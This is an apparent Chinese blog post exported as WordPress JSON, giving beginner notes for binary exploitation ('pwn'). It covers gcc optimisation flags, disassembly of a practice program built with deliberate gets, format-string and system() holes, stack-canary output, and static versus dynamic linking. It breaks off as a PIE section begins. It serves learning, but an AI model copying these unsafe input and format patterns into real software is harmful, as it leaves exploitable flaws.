{"id":179,"date":"2022-06-16T01:55:01","date_gmt":"2022-06-15T17:55:01","guid":{"rendered":"http:\/\/162.14.82.114\/?p=179"},"modified":"2022-06-16T01:56:06","modified_gmt":"2022-06-15T17:56:06","slug":"pwn%e4%b8%80%e4%ba%9b%e8%b6%85%e7%ba%a7%e5%9f%ba%e7%a1%80%e6%80%a7%e7%9a%84%e7%9f%a5%e8%af%86","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/179\/06\/16\/2022\/","title":{"rendered":"pwn\u4e00\u4e9b\u8d85\u7ea7\u57fa\u7840\u6027\u7684\u77e5\u8bc6"},"content":{"rendered":"<h1>gcc -o<\/h1>\n<blockquote>\n<p>gcc -O1\/O2\/O3<\/p>\n<p><code>-O\uff0c-O1\uff1a\u8fd9\u4e24\u4e2a\u547d\u4ee4\u7684\u6548\u679c\u662f\u4e00\u6837\u7684\uff0c\u76ee\u7684\u90fd\u662f\u5728\u4e0d\u5f71\u54cd\u7f16\u8bd1\u901f\u5ea6\u7684\u524d\u63d0\u4e0b\uff0c\u5c3d\u91cf\u91c7\u7528\u4e00\u4e9b\u4f18\u5316\u7b97\u6cd5\u964d\u4f4e\u4ee3\u7801\u5927\u5c0f\u548c\u53ef\u6267\u884c\u4ee3\u7801\u7684\u8fd0\u884c\u901f\u5ea6\u3002<\/code><\/p>\n<p><code> -O2\u8be5\u4f18\u5316\u9009\u9879\u4f1a\u727a\u7272\u90e8\u5206\u7f16\u8bd1\u901f\u5ea6\uff0c\u9664\u4e86\u6267\u884c-O1\u6240\u6267\u884c\u7684\u6240\u6709\u4f18\u5316\u4e4b\u5916\uff0c\u8fd8\u4f1a\u91c7\u7528\u51e0\u4e4e\u6240\u6709\u7684\u76ee\u6807\u914d\u7f6e\u652f\u6301\u7684\u4f18\u5316\u7b97\u6cd5\uff0c\u7528\u4ee5\u63d0\u9ad8\u76ee\u6807\u4ee3\u7801\u7684\u8fd0\u884c\u901f\u5ea6\u3002<\/code><\/p>\n<p><code>-O3\u8be5\u9009\u9879\u9664\u4e86\u6267\u884c-O2\u6240\u6709\u7684\u4f18\u5316\u9009\u9879\u4e4b\u5916\uff0c\u4e00\u822c\u90fd\u662f\u91c7\u53d6\u5f88\u591a\u5411\u91cf\u5316\u7b97\u6cd5\uff0c\u63d0\u9ad8\u4ee3\u7801\u7684\u5e76\u884c\u6267\u884c\u7a0b\u5ea6\uff0c\u5229\u7528\u73b0\u4ee3CPU\u4e2d\u7684\u6d41\u6c34\u7ebf\uff0cCache\u7b49\u3002<\/code><\/p>\n<p><code>-Os\u8fd9\u4e2a\u4f18\u5316\u6807\u8bc6\u548c-O3\u6709\u5f02\u66f2\u540c\u5de5\u4e4b\u5999\uff0c\u5f53\u7136\u4e24\u8005\u7684\u76ee\u6807\u4e0d\u4e00\u6837\uff0c-O3\u7684\u76ee\u6807\u662f\u5b81\u613f\u589e\u52a0\u76ee\u6807\u4ee3\u7801\u7684\u5927\u
5c0f\uff0c\u4e5f\u8981\u62fc\u547d\u7684\u63d0\u9ad8\u8fd0\u884c\u901f\u5ea6\uff0c\u4f46\u662f\u8fd9\u4e2a\u9009\u9879\u662f\u5728-O2\u7684\u57fa\u7840\u4e4b\u4e0a\uff0c\u5c3d\u91cf\u7684\u964d\u4f4e\u76ee\u6807\u4ee3\u7801\u7684\u5927\u5c0f\uff0c\u8fd9\u5bf9\u4e8e\u5b58\u50a8\u5bb9\u91cf\u5f88\u5c0f\u7684\u8bbe\u5907\u6765\u8bf4\u975e\u5e38\u91cd\u8981\u3002<\/code><\/p>\n<p><code>Ofast:\u8be5\u9009\u9879\u5c06\u4e0d\u4f1a\u4e25\u683c\u9075\u5faa\u8bed\u8a00\u6807\u51c6\uff0c\u9664\u4e86\u542f\u7528\u6240\u6709\u7684-O3\u4f18\u5316\u9009\u9879\u4e4b\u5916\uff0c\u4e5f\u4f1a\u9488\u5bf9\u67d0\u4e9b\u8bed\u8a00\u542f\u7528\u90e8\u5206\u4f18\u5316\u3002<\/code><\/p>\n<p><code>-Og:\u8be5\u6807\u8bc6\u4f1a\u7cbe\u5fc3\u6311\u9009\u90e8\u5206\u4e0e-g\u9009\u9879\u4e0d\u51b2\u7a81\u7684\u4f18\u5316\u9009\u9879\uff0c\u5f53\u7136\u5c31\u80fd\u63d0\u4f9b\u5408\u7406\u7684\u4f18\u5316\u6c34\u5e73\uff0c\u540c\u65f6\u4ea7\u751f\u8f83\u597d\u7684\u53ef\u8c03\u8bd5\u4fe1\u606f\u548c\u5bf9\u8bed\u8a00\u6807\u51c6\u7684\u9075\u5faa\u7a0b\u5ea6<\/code><\/p>\n<p>\u8be6\u60c5\u53ef\u4ee5\u53c2\u8003<a href=\"https:\/\/www.zhihu.com\/question\/27090458\">GCC\u4e2d-O1 -O2 -O3 \u4f18\u5316\u7684\u539f\u7406\u662f\u4ec0\u4e48\uff1f - \u77e5\u4e4e (zhihu.com)<\/a>                                                                                                                                   <\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ gcc question_1.c -O3 -o question_1_x64_O3\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? 
[-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\nquestion_1.c: In function \u2018func\u2019:\nquestion_1.c:13:2: warning: ignoring return value of \u2018system\u2019, declared with attribute warn_unused_result [-Wunused-result]\n  system(cmd);\n  ^~~~~~~~~~~\n\/tmp\/ccysfJzi.o: In function `main&#039;:\nquestion_1.c:(.text.startup+0x32): warning: the `gets&#039; function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ objdump -d question_1_x64_O3 -M intel |less\nquestion_1_x64_O3:     file format elf64-x86-64\nDisassembly of section .init:\n0000000000000708 &lt;_init&gt;:\n 708:   48 83 ec 08             sub    rsp,0x8\n 70c:   48 8b 05 d5 08 20 00    mov    rax,QWORD PTR [rip+0x2008d5]        # 200fe8 &lt;__gmon_start__&gt;\n 713:   48 85 c0                test   rax,rax\n 716:   74 02                   je     71a &lt;_init+0x12&gt;\n 718:   ff d0                   call   rax\n 71a:   48 83 c4 08             add    rsp,0x8\n 71e:   c3                      ret\n\nDisassembly of section .plt:\n\n0000000000000720 &lt;.plt&gt;:\n 720:   ff 35 72 08 20 00       push   QWORD PTR [rip+0x200872]        # 200f98 &lt;_GLOBAL_OFFSET_TABLE_+0x8&gt;\n 726:   ff 25 74 08 20 00       jmp    QWORD PTR [rip+0x200874]        # 200fa0 &lt;_GLOBAL_OFFSET_TABLE_+0x10&gt;\n 72c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n\n0000000000000730 &lt;puts@plt&gt;:\n 730:   ff 25 72 08 20 00       jmp    QWORD PTR [rip+0x200872]        # 200fa8 &lt;puts@GLIBC_2.2.5&gt;\n 736:   68 00 00 00 00          push   0x0\n 73b:   e9 e0 ff ff ff          jmp    720 &lt;.plt&gt;\n\n0000000000000740 &lt;__stack_chk_fail@plt&gt;:\n 740:   ff 25 6a 08 20 00       jmp    QWORD PTR [rip+0x20086a]        # 200fb0 &lt;__stack_chk_fail@GLIBC_2.4&gt;\n 746:   68 01 00 00 00          push   0x1\n 74b:   e9 
d0 ff ff ff          jmp    720 &lt;.plt&gt;\n\n0000000000000750 &lt;system@plt&gt;:\n 750:   ff 25 62 08 20 00       jmp    QWORD PTR [rip+0x200862]        # 200fb8 &lt;system@GLIBC_2.2.5&gt;\n 756:   68 02 00 00 00          push   0x2\n 75b:   e9 c0 ff ff ff          jmp    720 &lt;.plt&gt;\n\n0000000000000760 &lt;gets@plt&gt;:\n 760:   ff 25 5a 08 20 00       jmp    QWORD PTR [rip+0x20085a]        # 200fc0 &lt;gets@GLIBC_2.2.5&gt;\n 766:   68 03 00 00 00          push   0x3\n 76b:   e9 b0 ff ff ff          jmp    720 &lt;.plt&gt;\n\n0000000000000770 &lt;__printf_chk@plt&gt;:\n 770:   ff 25 52 08 20 00       jmp    QWORD PTR [rip+0x200852]        # 200fc8 &lt;__printf_chk@GLIBC_2.3.4&gt;\n 776:   68 04 00 00 00          push   0x4\n 77b:   e9 a0 ff ff ff          jmp    720 &lt;.plt&gt;\n\n0000000000000780 &lt;setvbuf@plt&gt;:\n 780:   ff 25 4a 08 20 00       jmp    QWORD PTR [rip+0x20084a]        # 200fd0 &lt;setvbuf@GLIBC_2.2.5&gt;\n 786:   68 05 00 00 00          push   0x5\n 78b:   e9 90 ff ff ff          jmp    720 &lt;.plt&gt;\n\nDisassembly of section .plt.got:\n\n0000000000000790 &lt;__cxa_finalize@plt&gt;:\n 790:   ff 25 62 08 20 00       jmp    QWORD PTR [rip+0x200862]        # 200ff8 &lt;__cxa_finalize@GLIBC_2.2.5&gt;\n 796:   66 90                   xchg   ax,ax\n\nDisassembly of section .text:\n\n00000000000007a0 &lt;main&gt;:\n 7a0:   53                      push   rbx\n 7a1:   48 8d 3d 5c 02 00 00    lea    rdi,[rip+0x25c]        # a04 &lt;_IO_stdin_used+0x4&gt;\n 7a8:   48 83 ec 10             sub    rsp,0x10\n 7ac:   48 89 e3                mov    rbx,rsp\n 7af:   48 c7 04 24 00 00 00    mov    QWORD PTR [rsp],0x0\n 7b6:   00\n 7b7:   64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n 7be:   00 00\n 7c0:   48 89 44 24 08          mov    QWORD PTR [rsp+0x8],rax\n 7c5:   31 c0                   xor    eax,eax\n 7c7:   e8 64 ff ff ff          call   730 &lt;puts@plt&gt;\n 7cc:   48 89 df                mov    rdi,rbx\n 7cf:   31 c0               
    xor    eax,eax\n 7d1:   e8 8a ff ff ff          call   760 &lt;gets@plt&gt;\n 7d6:   31 c0                   xor    eax,eax\n 7d8:   48 89 de                mov    rsi,rbx\n 7db:   bf 01 00 00 00          mov    edi,0x1\n 7e0:   e8 8b ff ff ff          call   770 &lt;__printf_chk@plt&gt;\n 7e5:   48 8b 54 24 08          mov    rdx,QWORD PTR [rsp+0x8]\n 7ea:   64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n 7f1:   00 00\n 7f3:   75 08                   jne    7fd &lt;main+0x5d&gt;\n 7f5:   48 83 c4 10             add    rsp,0x10\n 7f9:   31 c0                   xor    eax,eax\n 7fb:   5b                      pop    rbx\n 7fc:   c3                      ret\n 7fd:   e8 3e ff ff ff          call   740 &lt;__stack_chk_fail@plt&gt;\n 802:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 809:   00 00 00\n 80c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n\n0000000000000810 &lt;_start&gt;:\n 810:   31 ed                   xor    ebp,ebp\n 812:   49 89 d1                mov    r9,rdx\n 815:   5e                      pop    rsi\n 816:   48 89 e2                mov    rdx,rsp\n 819:   48 83 e4 f0             and    rsp,0xfffffffffffffff0\n 81d:   50                      push   rax\n 81e:   54                      push   rsp\n 81f:   4c 8d 05 ca 01 00 00    lea    r8,[rip+0x1ca]        # 9f0 &lt;__libc_csu_fini&gt;\n 826:   48 8d 0d 53 01 00 00    lea    rcx,[rip+0x153]        # 980 &lt;__libc_csu_init&gt;\n 82d:   48 8d 3d 6c ff ff ff    lea    rdi,[rip+0xffffffffffffff6c]        # 7a0 &lt;main&gt;\n 834:   ff 15 a6 07 20 00       call   QWORD PTR [rip+0x2007a6]        # 200fe0 &lt;__libc_start_main@GLIBC_2.2.5&gt;\n 83a:   f4                      hlt\n 83b:   0f 1f 44 00 00          nop    DWORD PTR [rax+rax*1+0x0]\n\n0000000000000840 &lt;deregister_tm_clones&gt;:\n 840:   48 8d 3d d1 07 20 00    lea    rdi,[rip+0x2007d1]        # 201018 &lt;__TMC_END__&gt;\n 847:   55                      push   rbp\n 848:   48 8d 05 c9 07 20 00    lea    
rax,[rip+0x2007c9]        # 201018 &lt;__TMC_END__&gt;\n 84f:   48 39 f8                cmp    rax,rdi\n 852:   48 89 e5                mov    rbp,rsp\n 855:   74 19                   je     870 &lt;deregister_tm_clones+0x30&gt;\n 857:   48 8b 05 7a 07 20 00    mov    rax,QWORD PTR [rip+0x20077a]        # 200fd8 &lt;_ITM_deregisterTMCloneTable&gt;\n 85e:   48 85 c0                test   rax,rax\n 861:   74 0d                   je     870 &lt;deregister_tm_clones+0x30&gt;\n 863:   5d                      pop    rbp\n 864:   ff e0                   jmp    rax\n 866:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 86d:   00 00 00\n 870:   5d                      pop    rbp\n 871:   c3                      ret\n 872:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n 876:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 87d:   00 00 00\n\n0000000000000880 &lt;register_tm_clones&gt;:\n 880:   48 8d 3d 91 07 20 00    lea    rdi,[rip+0x200791]        # 201018 &lt;__TMC_END__&gt;\n 887:   48 8d 35 8a 07 20 00    lea    rsi,[rip+0x20078a]        # 201018 &lt;__TMC_END__&gt;\n 88e:   55                      push   rbp\n 88f:   48 29 fe                sub    rsi,rdi\n 892:   48 89 e5                mov    rbp,rsp\n 895:   48 c1 fe 03             sar    rsi,0x3\n 899:   48 89 f0                mov    rax,rsi\n 89c:   48 c1 e8 3f             shr    rax,0x3f\n 8a0:   48 01 c6                add    rsi,rax\n 8a3:   48 d1 fe                sar    rsi,1\n 8a6:   74 18                   je     8c0 &lt;register_tm_clones+0x40&gt;\n 8a8:   48 8b 05 41 07 20 00    mov    rax,QWORD PTR [rip+0x200741]        # 200ff0 &lt;_ITM_registerTMCloneTable&gt;\n 8af:   48 85 c0                test   rax,rax\n 8b2:   74 0c                   je     8c0 &lt;register_tm_clones+0x40&gt;\n 8b4:   5d                      pop    rbp\n 8b5:   ff e0                   jmp    rax\n 8b7:   66 0f 1f 84 00 00 00    nop    WORD PTR [rax+rax*1+0x0]\n 8be:   00 00\n 8c0:   5d        
              pop    rbp\n 8c1:   c3                      ret\n 8c2:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]\n 8c6:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 8cd:   00 00 00\n\n00000000000008d0 &lt;__do_global_dtors_aux&gt;:\n 8d0:   80 3d 71 07 20 00 00    cmp    BYTE PTR [rip+0x200771],0x0        # 201048 &lt;completed.7698&gt;\n 8d7:   75 2f                   jne    908 &lt;__do_global_dtors_aux+0x38&gt;\n 8d9:   48 83 3d 17 07 20 00    cmp    QWORD PTR [rip+0x200717],0x0        # 200ff8 &lt;__cxa_finalize@GLIBC_2.2.5&gt;\n 8e0:   00\n 8e1:   55                      push   rbp\n 8e2:   48 89 e5                mov    rbp,rsp\n 8e5:   74 0c                   je     8f3 &lt;__do_global_dtors_aux+0x23&gt;\n 8e7:   48 8b 3d 1a 07 20 00    mov    rdi,QWORD PTR [rip+0x20071a]        # 201008 &lt;__dso_handle&gt;\n 8ee:   e8 9d fe ff ff          call   790 &lt;__cxa_finalize@plt&gt;\n 8f3:   e8 48 ff ff ff          call   840 &lt;deregister_tm_clones&gt;\n 8f8:   c6 05 49 07 20 00 01    mov    BYTE PTR [rip+0x200749],0x1        # 201048 &lt;completed.7698&gt;\n 8ff:   5d                      pop    rbp\n 900:   c3                      ret\n 901:   0f 1f 80 00 00 00 00    nop    DWORD PTR [rax+0x0]\n 908:   f3 c3                   repz ret\n 90a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000910 &lt;frame_dummy&gt;:\n 910:   55                      push   rbp\n 911:   48 89 e5                mov    rbp,rsp\n 914:   5d                      pop    rbp\n 915:   e9 66 ff ff ff          jmp    880 &lt;register_tm_clones&gt;\n 91a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000920 &lt;init_func&gt;:\n 920:   48 83 ec 08             sub    rsp,0x8\n 924:   48 8b 3d 05 07 20 00    mov    rdi,QWORD PTR [rip+0x200705]        # 201030 &lt;stdin@@GLIBC_2.2.5&gt;\n 92b:   31 c9                   xor    ecx,ecx\n 92d:   ba 02 00 00 00          mov    edx,0x2\n 932:   31 f6                   xor   
 esi,esi\n 934:   e8 47 fe ff ff          call   780 &lt;setvbuf@plt&gt;\n 939:   48 8b 3d e0 06 20 00    mov    rdi,QWORD PTR [rip+0x2006e0]        # 201020 &lt;stdout@@GLIBC_2.2.5&gt;\n 940:   31 c9                   xor    ecx,ecx\n 942:   ba 02 00 00 00          mov    edx,0x2\n 947:   31 f6                   xor    esi,esi\n 949:   e8 32 fe ff ff          call   780 &lt;setvbuf@plt&gt;\n 94e:   48 8b 3d eb 06 20 00    mov    rdi,QWORD PTR [rip+0x2006eb]        # 201040 &lt;stderr@@GLIBC_2.2.5&gt;\n 955:   31 c9                   xor    ecx,ecx\n 957:   ba 02 00 00 00          mov    edx,0x2\n 95c:   31 f6                   xor    esi,esi\n 95e:   e8 1d fe ff ff          call   780 &lt;setvbuf@plt&gt;\n 963:   31 c0                   xor    eax,eax\n 965:   48 83 c4 08             add    rsp,0x8\n 969:   c3                      ret\n 96a:   66 0f 1f 44 00 00       nop    WORD PTR [rax+rax*1+0x0]\n\n0000000000000970 &lt;func&gt;:\n 970:   48 83 ec 08             sub    rsp,0x8\n 974:   e8 d7 fd ff ff          call   750 &lt;system@plt&gt;\n 979:   31 c0                   xor    eax,eax\n 97b:   48 83 c4 08             add    rsp,0x8\n 97f:   c3                      ret\n\n0000000000000980 &lt;__libc_csu_init&gt;:\n 980:   41 57                   push   r15\n 982:   41 56                   push   r14\n 984:   49 89 d7                mov    r15,rdx\n 987:   41 55                   push   r13\n 989:   41 54                   push   r12\n 98b:   4c 8d 25 fe 03 20 00    lea    r12,[rip+0x2003fe]        # 200d90 &lt;__frame_dummy_init_array_entry&gt;\n 992:   55                      push   rbp\n 993:   48 8d 2d fe 03 20 00    lea    rbp,[rip+0x2003fe]        # 200d98 &lt;__init_array_end&gt;\n 99a:   53                      push   rbx\n 99b:   41 89 fd                mov    r13d,edi\n 99e:   49 89 f6                mov    r14,rsi\n 9a1:   4c 29 e5                sub    rbp,r12\n 9a4:   48 83 ec 08             sub    rsp,0x8\n 9a8:   48 c1 fd 03             sar    
rbp,0x3\n 9ac:   e8 57 fd ff ff          call   708 &lt;_init&gt;\n 9b1:   48 85 ed                test   rbp,rbp\n 9b4:   74 20                   je     9d6 &lt;__libc_csu_init+0x56&gt;\n 9b6:   31 db                   xor    ebx,ebx\n 9b8:   0f 1f 84 00 00 00 00    nop    DWORD PTR [rax+rax*1+0x0]\n 9bf:   00\n 9c0:   4c 89 fa                mov    rdx,r15\n 9c3:   4c 89 f6                mov    rsi,r14\n 9c6:   44 89 ef                mov    edi,r13d\n 9c9:   41 ff 14 dc             call   QWORD PTR [r12+rbx*8]\n 9cd:   48 83 c3 01             add    rbx,0x1\n 9d1:   48 39 dd                cmp    rbp,rbx\n 9d4:   75 ea                   jne    9c0 &lt;__libc_csu_init+0x40&gt;\n 9d6:   48 83 c4 08             add    rsp,0x8\n 9da:   5b                      pop    rbx\n 9db:   5d                      pop    rbp\n 9dc:   41 5c                   pop    r12\n 9de:   41 5d                   pop    r13\n 9e0:   41 5e                   pop    r14\n 9e2:   41 5f                   pop    r15\n 9e4:   c3                      ret\n 9e5:   90                      nop\n 9e6:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 9ed:   00 00 00\n\n00000000000009f0 &lt;__libc_csu_fini&gt;:\n 9f0:   f3 c3                   repz ret\n\nDisassembly of section .fini:\n\n00000000000009f4 &lt;_fini&gt;:\n 9f4:   48 83 ec 08             sub    rsp,0x8\n 9f8:   48 83 c4 08             add    rsp,0x8\n 9fc:   c3                      ret\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_1$ .\/question_1_x64_O3\ninput:\naaaaaaaaaaaaaaa\n*** stack smashing detected ***: &lt;unknown&gt; terminated\nAborted<\/code><\/pre>\n<p><code>gcc -O3<\/code>\u9ed8\u8ba4\u5c06\u4e0d\u53ef\u80fd\u6267\u884c\u7684\u5185\u5bb9\u76f4\u63a5\u5220\u9664\u4e86\uff0c\u6240\u4ee5\u65e0\u6cd5\u6267\u884cshell<\/p>\n<h1>static<\/h1>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ 
ls\nquestion_1.c\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccU59NVv.o: In function `main&#039;:\nquestion_1.c:(.text+0xc4): warning: the `gets&#039; function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ gcc question_1.c -static -o question_1_x64_static\nquestion_1.c: In function \u2018main\u2019:\nquestion_1.c:22:2: warning: implicit declaration of function \u2018gets\u2019; did you mean \u2018fgets\u2019? [-Wimplicit-function-declaration]\n  gets(a);\n  ^~~~\n  fgets\nquestion_1.c:23:9: warning: format not a string literal and no format arguments [-Wformat-security]\n  printf(a);\n         ^\n\/tmp\/ccS7KXgP.o: In function `main&#039;:\nquestion_1.c:(.text+0xc4): warning: the `gets&#039; function is dangerous and should not be used.\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ls\na.out  question_1.c  question_1_x64_static\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ file a.out\na.out: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, for GNU\/Linux 3.2.0, BuildID[sha1]=89a75bb48f86071b8e7a8066be9f400348d5e184, not stripped\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ file question_1_x64_static\nquestion_1_x64_static: ELF 64-bit LSB executable, x86-64, version 1 (GNU\/Linux), statically linked, for GNU\/Linux 3.2.0, BuildID[sha1]=9d9740dc1b64a1dda55f20df2c02af26eaf10793, not stripped\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ldd a.out\n        
linux-vdso.so.1 (0x00007ffeee7ed000)\n        libc.so.6 =&gt; \/lib\/x86_64-linux-gnu\/libc.so.6 (0x00007fdaf2dcd000)\n        \/lib64\/ld-linux-x86-64.so.2 (0x00007fdaf33c0000)\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ldd question_1_x64_static\n        not a dynamic executable\nhack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ ll -h\ntotal 844K\ndrwxrwxrwx 1 hack hack 4.0K Jun 14 13:31 .\/\ndrwxrwxrwx 1 hack hack 4.0K Jun 10 17:53 ..\/\n-rwxrwxrwx 1 hack hack 8.6K Jun 14 13:30 a.out*\n-rwxrwxrwx 1 hack hack  409 Jun 10 17:53 question_1.c*\n-rwxrwxrwx 1 hack hack 831K Jun 14 13:31 question_1_x64_static*<\/code><\/pre>\n<pre><code class=\"language-bash\">hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d question_1_x64_static  -M intel |less\n#\u53ea\u622a\u53d6\u4e86main\uff0c\u548c\u4e0b\u9762\u5bf9\u6bd4\u4e00\u4e0b\uff1a\n0000000000400bf1 &lt;main&gt;:\n  400bf1:       55                      push   rbp\n  400bf2:       48 89 e5                mov    rbp,rsp\n  400bf5:       48 83 ec 20             sub    rsp,0x20\n  400bf9:       64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n  400c00:       00 00\n  400c02:       48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n  400c06:       31 c0                   xor    eax,eax\n  400c08:       48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n  400c0f:       00\n  400c10:       48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n  400c17:       00\n  400c18:       48 8d 3d a5 21 09 00    lea    rdi,[rip+0x921a5]        # 492dc4 &lt;_IO_stdin_used+0x4&gt;\n  400c1f:       e8 fc fd 00 00          call   410a20 &lt;_IO_puts&gt;\n  400c24:       48 8d 45 e8             lea    rax,[rbp-0x18]\n  400c28:       48 89 c7                mov    rdi,rax\n  400c2b:       b8 00 00 00 00          mov    eax,0x0\n  400c30:       e8 3b fc 00 00          call   410870 &lt;_IO_gets&gt;\n  400c35:       48 8d 45 e8             lea    
rax,[rbp-0x18]\n  400c39:       48 89 c7                mov    rdi,rax\n  400c3c:       b8 00 00 00 00          mov    eax,0x0\n  400c41:       e8 aa ef 00 00          call   40fbf0 &lt;_IO_printf&gt;\n  400c46:       0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n  400c4a:       3c 61                   cmp    al,0x61\n  400c4c:       75 0c                   jne    400c5a &lt;main+0x69&gt;\n  400c4e:       48 8d 3d 9b 94 2b 00    lea    rdi,[rip+0x2b949b]        # 6ba0f0 &lt;sh&gt;\n  400c55:       e8 78 ff ff ff          call   400bd2 &lt;func&gt;\n  400c5a:       b8 00 00 00 00          mov    eax,0x0\n  400c5f:       48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n  400c63:       64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n  400c6a:       00 00\n  400c6c:       74 05                   je     400c73 &lt;main+0x82&gt;\n  400c6e:       e8 4d b2 04 00          call   44bec0 &lt;__stack_chk_fail&gt;\n  400c73:       c9                      leave\n  400c74:       c3                      ret\n  400c75:       66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n  400c7c:       00 00 00\n  400c7f:       90                      nop\n hack@QC-20210627LTVJ:\/mnt\/e\/qqdownload\/pwn\/chapter_1\/test_4$ objdump -d a.out  -M intel |less\n 000000000000090e &lt;main&gt;:\n 90e:   55                      push   rbp\n 90f:   48 89 e5                mov    rbp,rsp\n 912:   48 83 ec 20             sub    rsp,0x20\n 916:   64 48 8b 04 25 28 00    mov    rax,QWORD PTR fs:0x28\n 91d:   00 00\n 91f:   48 89 45 f8             mov    QWORD PTR [rbp-0x8],rax\n 923:   31 c0                   xor    eax,eax\n 925:   48 c7 45 e8 00 00 00    mov    QWORD PTR [rbp-0x18],0x0\n 92c:   00\n 92d:   48 c7 45 f0 00 00 00    mov    QWORD PTR [rbp-0x10],0x0\n 934:   00\n 935:   48 8d 3d e8 00 00 00    lea    rdi,[rip+0xe8]        # a24 &lt;_IO_stdin_used+0x4&gt;\n 93c:   e8 cf fd ff ff          call   710 &lt;puts@plt&gt;\n 941:   48 8d 45 e8             lea    
rax,[rbp-0x18]\n 945:   48 89 c7                mov    rdi,rax\n 948:   b8 00 00 00 00          mov    eax,0x0\n 94d:   e8 fe fd ff ff          call   750 &lt;gets@plt&gt;\n 952:   48 8d 45 e8             lea    rax,[rbp-0x18]\n 956:   48 89 c7                mov    rdi,rax\n 959:   b8 00 00 00 00          mov    eax,0x0\n 95e:   e8 dd fd ff ff          call   740 &lt;printf@plt&gt;\n 963:   0f b6 45 f0             movzx  eax,BYTE PTR [rbp-0x10]\n 967:   3c 61                   cmp    al,0x61\n 969:   75 0c                   jne    977 &lt;main+0x69&gt;\n 96b:   48 8d 3d 9e 06 20 00    lea    rdi,[rip+0x20069e]        # 201010 &lt;sh&gt;\n 972:   e8 78 ff ff ff          call   8ef &lt;func&gt;\n 977:   b8 00 00 00 00          mov    eax,0x0\n 97c:   48 8b 55 f8             mov    rdx,QWORD PTR [rbp-0x8]\n 980:   64 48 33 14 25 28 00    xor    rdx,QWORD PTR fs:0x28\n 987:   00 00\n 989:   74 05                   je     990 &lt;main+0x82&gt;\n 98b:   e8 90 fd ff ff          call   720 &lt;__stack_chk_fail@plt&gt;\n 990:   c9                      leave\n 991:   c3                      ret\n 992:   66 2e 0f 1f 84 00 00    nop    WORD PTR cs:[rax+rax*1+0x0]\n 999:   00 00 00\n 99c:   0f 1f 40 00             nop    DWORD PTR [rax+0x0]<\/code><\/pre>\n<h1>no-pie<\/h1>\n<h2>\u57fa\u7840\u77e5\u8bc6<\/h2>\n<blockquote>\n<p>PIE(position-independent 